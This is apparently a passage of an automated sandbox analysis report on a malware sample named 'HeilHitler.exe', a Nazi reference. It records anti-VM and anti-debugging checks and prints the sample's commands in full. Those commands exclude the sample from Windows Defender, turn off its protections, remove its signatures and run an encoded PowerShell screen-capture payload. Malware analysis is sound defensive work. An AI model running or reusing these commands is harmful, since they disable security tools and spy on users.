              Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-Vn
              Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: getmac.exe, 00000032.00000003.1796493147.000001B102B50000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1795863967.000001B102B52000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD436E3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD436E9000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2032871935.000001BD44140000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1906535342.000001BD436B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF633D6D12C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF31940 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAF31940
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D83480 GetProcessHeap,0_2_00007FF633D83480
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D6D30C SetUnhandledExceptionFilter,0_2_00007FF633D6D30C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF633D6D12C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF633D6C8A0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF633D7A614
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D6D30C SetUnhandledExceptionFilter,1_2_00007FF633D6D30C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF633D6D12C
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF633D6C8A0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF633D7A614
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAD63048 IsProcessorFeaturePresent,00007FFE133319C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE133319C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAD63048
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE82009 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAE82009
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF45A1F IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAF45A1F
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C5B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_00007FF702C5B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C5B6D8 SetUnhandledExceptionFilter,68_2_00007FF702C5B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C5A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,68_2_00007FF702C5A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C64C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_00007FF702C64C10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Users\user\Desktop\HeilHitler.exe "C:\Users\user\Desktop\HeilHitler.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
